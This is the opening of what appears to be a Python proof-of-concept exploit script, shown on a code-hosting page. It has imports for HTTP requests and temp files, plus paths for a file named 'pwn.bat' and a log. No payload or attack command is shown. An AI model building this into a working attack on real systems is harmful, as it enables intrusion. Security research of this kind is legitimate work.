This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from json import dumps | |
from os import name | |
from pathlib import Path | |
from sys import argv | |
from tempfile import mkdtemp | |
from urllib.request import Request, urlopen | |
temp = Path(mkdtemp()) | |
pwn = temp / "pwn.bat" | |
log = temp / "log" |